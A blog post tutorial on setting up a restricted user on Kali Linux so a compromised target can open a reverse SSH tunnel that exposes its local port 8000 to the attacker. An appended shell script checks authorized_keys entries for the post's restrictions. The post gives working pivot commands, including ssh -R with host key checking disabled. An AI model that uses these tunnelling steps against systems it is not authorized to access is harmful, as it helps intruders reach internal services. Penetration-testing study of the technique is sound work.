Kali reverse SSH

the-coder · March 6, 2022

The following instructions configure a user on Kali that lets the target connect back and tunnel its ports to Kali. This is really useful when you have not compromised the SSH user account on the system, but you need to tunnel traffic to the machine’s local ports.

First, create an SSH key pair on your Kali machine. It is a good idea to create a new key, even if you already have one.

ssh-keygen -t rsa

Create a new user on your Kali machine (or any Linux distro):

sudo useradd mole -m

Go to its /home/mole/.ssh folder, create the following authorized_keys file, and set the correct permissions.

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla

Change the from value to the address of the target server that the SSH connection will come from, and replace the SSH key portion with the public key generated in the first step. This entry only accepts connections from the IP address given in the from argument, and it only allows port forwarding and nothing else.

chmod 700 /home/mole/.ssh
chmod 600 /home/mole/.ssh/authorized_keys
sudo chown mole:mole /home/mole/.ssh -R

After configuring the above permissions, copy the private key over to the target server. Then you can use it to connect back to your Kali machine.

Before you connect back, make sure your ssh service is running.

sudo systemctl start ssh

Then the following command will connect back to Kali and forward port 8000 from Kali to the target server’s local port 8000.

ssh -f -N -R 8000:localhost:8000 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key mole@ip

With all this, you will be able to access the target server’s local port 8000 from port 8000 on your Kali machine, without having compromised the target’s SSH user account.
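
An added example (not from the original post): a POSIX shell check that an authorized_keys entry carries every restriction used in the entry above, so a tunnel-only account is not left with a weaker line by mistake. The function names, sample entries and key placeholders are constructed for illustration.

```shell
#!/bin/sh
# Restrictions used by the authorized_keys entry on this page (lowercased).
REQUIRED="from= command= no-agent-forwarding no-x11-forwarding no-pty"

# Constructed sample entries; key material and addresses are placeholders.
SAMPLE_GOOD='from="192.0.2.10",command="echo forwarding only",no-agent-forwarding,no-X11-forwarding,no-pty ssh-ed25519 AAAAPLACEHOLDER mole'
SAMPLE_WEAK='no-pty ssh-ed25519 AAAAPLACEHOLDER mole'
SAMPLE_BARE='ssh-ed25519 AAAAPLACEHOLDER mole'

# Print the options field of one entry: quoted values removed, names lowercased
# (sshd matches option names case-insensitively). Empty if the line has none.
entry_options() {
    stripped=$(printf '%s\n' "$1" |
        sed -E -e 's/"(\\.|[^"\\])*"//g' -e 's/[[:space:]]+/ /g')
    first=${stripped%% *}
    case $first in
        ssh-*|ecdsa-*|sk-*) ;;                      # starts with the key type
        *) printf '%s' "$first" | tr '[:upper:]' '[:lower:]' ;;
    esac
}

# Print the required restrictions that an entry lacks, space-separated.
missing_restrictions() {
    opts=",$(entry_options "$1"),"
    missing=""
    for req in $REQUIRED; do
        case $opts in
            *",$req,"*) ;;
            *) missing="$missing $req" ;;
        esac
    done
    printf '%s' "${missing# }"
}

# Audit a whole file; return 1 if any key entry lacks a restriction.
audit_authorized_keys() {
    rc=0; n=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case $line in ''|'#'*) continue ;; esac
        m=$(missing_restrictions "$line")
        [ -z "$m" ] || { echo "line $n: missing $m"; rc=1; }
    done < "$1"
    return "$rc"
}

for s in "$SAMPLE_GOOD" "$SAMPLE_WEAK" "$SAMPLE_BARE"; do
    echo "missing: [$(missing_restrictions "$s")]"
done
```

Run audit_authorized_keys /home/mole/.ssh/authorized_keys after editing the file; a non-zero exit status means at least one key line lacks a restriction.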
